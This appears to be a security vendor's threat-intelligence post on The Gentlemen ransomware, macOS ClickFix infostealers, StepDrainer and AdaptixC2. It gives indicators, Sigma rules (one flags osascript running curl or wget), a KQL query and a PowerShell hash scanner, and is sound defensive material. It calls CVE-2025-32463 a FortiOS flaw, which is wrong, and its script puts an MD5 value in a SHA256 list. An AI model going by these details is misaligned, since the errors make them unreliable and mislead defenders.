Back to Intelligence

The Gentlemen RaaS, macOS ClickFix & AdaptixC2: Multi-Vector Infostealer & Credential Theft Analysis

SA
Security Arsenal Team
April 21, 2026
6 min read

Date: 2026-04-21 Source: AlienVault OTX Live Pulse Data Category: Infostealer & Credential Theft Campaigns

Threat Summary

Recent OTX pulses indicate a high-convergence threat landscape where credential theft acts as a precursor or dual objective alongside ransomware operations. The primary actor, The Gentlemen, has aggressively expanded its RaaS operations, exploiting critical vulnerabilities in FortiOS and VMware ESXi to gain initial access before deploying SystemBC for covert C2 tunneling.

Simultaneously, a surge in macOS ClickFix campaigns and the StepDrainer MaaS platform highlights a broad focus on bypassing user psychology to harvest credentials and drain cryptocurrency wallets. The presence of AdaptixC2, a modular post-exploitation framework, suggests that APT groups are increasingly adopting open-source tools to maintain persistence and evade detection in multi-platform environments.

Attack Chain:

  1. Initial Access: Exploitation of CVE-2024-37085 / CVE-2025-32463 (FortiOS) or Social Engineering (Fake CAPTCHA/ClickFix).
  2. Execution: Deployment of AppleScript (macOS) or SystemBC/AdaptixC2 (Windows/Linux).
  3. Persistence: C2 tunneling via SystemBC; Beacon Object Files (BOFs) via AdaptixC2.
  4. Objective: Credential dumping (Mimikatz), browser session hijacking, crypto wallet draining, or ESXi encryption (Ransomware).

Threat Actor / Malware Profile

1. The Gentlemen (RaaS)

  • Type: Ransomware-as-a-Service.
  • Malware Families: Babuk (S0638), Babyk, Vasa Locker, Qilin, LockBit 5.0.
  • Distribution: Exploits public-facing applications (FortiOS/FortiProxy vulnerabilities). Maintains a database of compromised devices.
  • Infrastructure: Uses SystemBC for proxying traffic to hide C2 communication. Utilizes Cobalt Strike and AnyDesk for lateral movement.
  • Targets: Multi-platform (Windows, Linux, NAS, BSD, ESXi).

2. macOS ClickFix Campaign

  • Type: Social Engineering / Infostealer.
  • Distribution: Fake CAPTCHA pages forcing users to execute malicious AppleScript commands.
  • Behavior: Harvests keychain databases, credentials, and session cookies from 12+ browsers and 200+ extensions. Targets 16 cryptocurrency wallets.
  • TTP: Session hijacking, browser data exfiltration.

3. StepDrainer (MaaS)

  • Type: Cryptocurrency Drainer.
  • Behavior: Engineered to steal digital assets (fungible tokens, NFTs) via smart contract interactions. Abuses ERC-20 token permissions and NFT approval mechanisms.
  • Scope: Supports 20+ blockchain networks.

4. AdaptixC2

  • Type: Post-Exploitation Framework.
  • Capabilities: Written in Go/C++. Supports Windows, macOS, Linux. Uses Beacon Object Files (BOFs).
  • C2: HTTP/S, TCP, mTLS, DNS, DoH, SMB with RC4 encryption. Associated with CloudAtlas and MgBot campaigns.

IOC Analysis

The provided IOCs offer a comprehensive view of the infrastructure supporting these campaigns.

  • CVEs: High-priority patching required for CVE-2024-37085 (VMware ESXi) and CVE-2025-32463 (FortiOS).
  • Domains (StepDrainer/ClickFix): bull-run.fun, spot-wave.fun, moonscan.live, scanclaw.live. These are often used in phishing kits or malicious hosting. SOC teams should sinkhole these domains immediately.
  • File Hashes: Multiple MD5, SHA1, and SHA256 hashes associated with The Gentlemen payloads and AdaptixC2 agents. These should be loaded into EDR quarantine lists.
  • IP Addresses: 172.94.9.250 (Voxility LLP, DE) associated with the macOS ClickFix C2.

Operational Guidance:

  1. Blocklist: Add all domains and IPs to perimeter firewalls and Secure Web Gateways.
  2. Hunt: Use the provided file hashes to scan historical endpoint telemetry for execution artifacts.
  3. Network: Monitor for outbound connections to the specific ASN (AS3223) and the non-standard ports often used by AdaptixC2.

Detection Engineering

Sigma Rules

YAML
---
title: Potential macOS ClickFix AppleScript Execution
id: 8a4b3c1d-5e6f-4a7b-8c9d-0e1f2a3b4c5d
description: Detects the execution of AppleScript via osascript often used in ClickFix campaigns to steal browser data and credentials.
references:
    - https://otx.alienvault.com/pulse/62451d2b5b5f4c2b8e1a5b5f/
author: Security Arsenal
status: experimental
date: 2026/04/21
tags:
    - attack.execution
    - attack.t1059.002
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        Image|endswith: '/osascript'
        CommandLine|contains:
            - 'curl'
            - 'wget'
            - 'http://'
    condition: selection
falsepositives:
    - Legitimate administrator scripts
level: high
---
title: SystemBC Proxy C2 Traffic Pattern
id: 9b5c4d2e-6f7a-5b8c-9d0e-1f2a3b4c5d6e
description: Detects network traffic patterns consistent with SystemBC proxy malware often used by The Gentlemen affiliates for covert tunneling.
references:
    - https://otx.alienvault.com/pulse/62451d2b5b5f4c2b8e1a5b5f/
author: Security Arsenal
status: experimental
date: 2026/04/21
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationPort:
            - 80
            - 443
    filter_mainstream:
        DestinationHostname|contains:
            - '.microsoft.com'
            - '.apple.com'
            - '.google.com'
            - '.amazonaws.com'
    condition: selection and not filter_mainstream | count(SourcePort) > 5
falsepositives:
    - High-volume web browsing
level: medium
---
title: AdaptixC2 Process Injection Indicator
id: 0c1d2e3f-7a8b-6c9d-0e1f-2a3b4c5d6e7f
description: Detects potential AdaptixC2 agent behavior characterized by specific process injection techniques often utilizing Go/C++ binaries.
references:
    - https://otx.alienvault.com/pulse/62451d2b5b5f4c2b8e1a5b5f/
author: Security Arsenal
status: experimental
date: 2026/04/21
tags:
    - attack.defense_evasion
    - attack.t1055.001
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        Image|endswith:
            - '.exe'
            - '.dll'
    selection_cli:
        CommandLine|contains:
            - '/inject'
            - 'reflective'
    condition: all of selection_*
falsepositives:
    - Legitimate security tools
level: high

KQL Hunt Query (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for connections to ClickFix and StepDrainer infrastructure
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in~ (
    'bull-run.fun', 
    'spot-wave.fun', 
    'moonscan.live', 
    'scanclaw.live',
    'aodefevrgdkhqltdnwgzbyjoywrlbntbhfwq.com',
    'aahdjjsivunugynqjvyfbhqnjekniyfboma.com'
    )
| summarize Count=count(), FirstSeen=min(Timestamp), LastSeen=max(Timestamp) by DeviceName, RemoteUrl, RemoteIP, InitiatingProcessFileName
| order by Count desc

PowerShell Hunt Script

PowerShell
<#
    Hunt Script: The Gentlemen & AdaptixC2 Artifacts
    Description: Scans endpoint for known file hashes and suspicious process connections.
#>

$TargetHashes = @(
    '3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235',
    '51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2',
    '7fd19c564761e2c8c9b583cf30db810e313417c7d3572f637f8cedf4d2cc1e91',
    'f212fd00d9ffc0f3d868845f7f4215cb'
)

Write-Host "[*] Scanning for The Gentlemen and AdaptixC2 IOCs..."

$Drives = Get-PSDrive -PSProvider FileSystem

foreach ($Drive in $Drives) {
    Write-Host "Scanning drive $($Drive.Root)..."
    Get-ChildItem -Path $Drive.Root -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { 
        -not $_.PSIsContainer -and 
        $_.Length -gt 0kb -and 
        $_.Length -lt 50mb 
    } | 
    ForEach-Object {
        $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($TargetHashes -contains $Hash) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }
}

Write-Host "[*] Checking for unusual process connections (SystemBC/AdaptixC2)..."
$NetTCP = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue
foreach ($Conn in $NetTCP) {
    try {
        $Process = Get-Process -Id $Conn.OwningProcess -ErrorAction Stop
        if ($Conn.RemoteAddress -notmatch "^(127\.|10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.)" ) {
             Write-Host "[INFO] $($Process.ProcessName) connected to $($Conn.RemoteAddress):$($Conn.RemotePort)"
        }
    } catch { continue }
}


---

Response Priorities

Immediate (0-4 Hours):

  • Block IOCs: Immediately block all listed domains (bull-run.fun, spot-wave.fun, moonscan.live) and IPs (172.94.9.250) at the perimeter and proxy level.
  • Patch Management: Prioritize patching for CVE-2024-37085 (VMware ESXi) and CVE-2025-32463 (FortiOS) to prevent The Gentlemen initial access.

24 Hours:

  • Credential Audit: If macOS ClickFix activity is suspected, force a password reset for high-privilege users and revoke active browser sessions.
  • Endpoint Hunt: Run the PowerShell hunt script across the fleet to identify dropped payloads associated with AdaptixC2 or The Gentlemen.

1 Week:

  • Architecture Hardening: Review and restrict external access to management interfaces (ESXi, FortiGate). Implement strict application allow-listing for macOS endpoints to prevent unauthorized AppleScript execution.
  • Crypto Wallet Policy: Enforce cold-storage policies for high-value digital assets given the prevalence of StepDrainer and ClickFix.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsthe-gentlemenmacos-clickfixadaptixc2infostealerransomware

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action